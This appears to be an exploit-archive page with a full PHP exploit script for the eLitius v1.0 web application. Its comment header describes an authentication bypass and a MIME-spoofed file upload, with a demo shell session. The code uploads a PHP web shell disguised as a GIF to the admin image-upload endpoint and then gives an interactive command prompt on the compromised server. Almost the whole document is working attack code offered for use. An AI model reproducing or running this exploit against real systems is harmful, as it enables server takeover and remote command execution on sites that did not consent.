Home / os / win10

elitius-exec.txt

Posted on 05 May 2009

<?php //786 /* ============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ \_ |_____| |_____| /_/ \_ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | | | / _ | |/ / | | _ | || |_ | | | | | | | | ' / | |_| | |__ _| | | | | |_| | | . \n\____| |_| |_| \_| \___/ |_|\_ I'm From Iran... ============================================================================== eLitius v1.0 Remote Command Execution Exploit ============================================================================== [ª] Script:.............[ eLitius v1.0 ].............................. [ª] Website:............[ http://www.elitius.com/ ]................... [ª] Today:..............[ 30042009 ].................................. [ª] Founder:............[ G4N0K | mail[o]ganok[sh!t]gmail.com ]....... [!] What is going on... --------------------------------- 00. Auth Bypass... 01. Arbitrary File upload (MIME-Type Spoofing)... [+] demo... --------------------------------- xpl.php 127.0.0.1 /eLitius_v_1_0/ +-------------------------------------------------------------+ | eLitius v1.0 Remote Command Execution Exploit | | by: G4N0K | mail[o]ganok[ta]com | | Thanks: ALLAH, MSD, SMN, AMD, AFN | +-------------------------------------------------------------+ [+] Trying to exploit 127.0.0.1... [+] File has been uploaded... [+] Now you can exec your commands... php-shell@127.0.0.1# dir Volume in drive E has no label. Volume Serial Number is 042D-D300 Directory of E:wwweLitius_v_1_0adminanners 09/09/2009 03:01 AM <DIR> . 09/09/2009 03:01 AM <DIR> .. 09/09/2009 07:58 PM 104,747 1.gif 09/09/2009 03:01 AM 89 banner_ditails.php 09/09/2009 07:58 PM 104,747 DEH-P9800BT remote control.gif 09/09/2009 08:33 AM 19,638 sponimage.php.gif 4 File(s) 232,681 bytes 2 Dir(s) 125,026,304 bytes free php-shell@127.0.0.1# exit C:> */ error_reporting(0); if (php_sapi_name() <> "cli") { die("WTF, Run Me From CommandLine..."); } if ($argc <> 3){__nfo();__usg();exit;} $hst = $argv[1]; $pth = $argv[2]; function __snd($hst, $pkt) { $socket = fsockopen($hst, 80, $errno, $errstr, 30); $ggg=''; if (!$socket) { echo " [+] Socket err#: $errstr ($errno) ";exit; } else { fwrite($socket, $pkt); while (!feof($socket)) { $g4n0k.=fgets($socket, 2048); } fclose($socket); return $g4n0k; } } function __srch($wt){ $pos = strpos($wt, 'gnkgnkgnk'); $pos_end = strrpos($wt, 'gnkgnkgnk'); if (!$pos && !$pos_end){echo " [!] error... ";} $rest = substr($wt, $pos+9, ($pos_end - ($pos+9))); return $rest; } function __nfo() { $ganok = <<<EOL +-------------------------------------------------------------+ | eLitius v1.0 Remote Command Execution Exploit | | by: G4N0K | mail[o]ganok[ta]com | | Thanks: ALLAH, MSD, SMN, AMD, AFN | +-------------------------------------------------------------+ EOL; print $ganok; } function __usg() { echo <<<GNK uasge...: xpl.php host path xpl.php 127.0.0.1 /eLitius_v_1_0/ GNK; } $joke = '-----------------------------3902153292 Content-Disposition: form-data; name="userfile"; filename="banner_ditails.php" Content-Type: image/gif <?php error_reporting(0);print("gnkgnkgnk");passthru($_GET["gnk"]);print("gnkgnkgnk"); ?> -----------------------------3902153292 Content-Disposition: form-data; name="fileupload" Upload -----------------------------3902153292 Content-Disposition: form-data; name="directory" banners -----------------------------3902153292-- '; $msd_pyld = "POST {$pth}admin/uploadimage.php HTTP/1.1 "; $msd_pyld .= "Host: {$hst} "; $msd_pyld .= "Keep-Alive: 300 "; $msd_pyld .= "Connection: keep-alive "; $msd_pyld .= "Content-Length: ".strlen($joke)." "; $msd_pyld .= "Content-Type: multipart/form-data; boundary=---------------------------3902153292 "; $msd_pyld .= $joke; __nfo(); echo " [+] Trying to exploit {$hst}... "; if (stristr(__snd($hst, $msd_pyld), "uploaded")){ echo " [+] File has been uploaded... [+] Now you can exec your commands... "; } else { echo " [+] Oops!, Upload failed. "; exit; } while(1) { echo " php-shell@{$hst}# "; if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit; $smn_pyld = "GET {$pth}admin/banners/banner_ditails.php?gnk=".$cmd." HTTP/1.1 "; $smn_pyld .= "Host: {$hst} "; $smn_pyld .= "Connection: close "; print __srch(__snd($hst, $smn_pyld)); } ?>

 

TOP

Malware :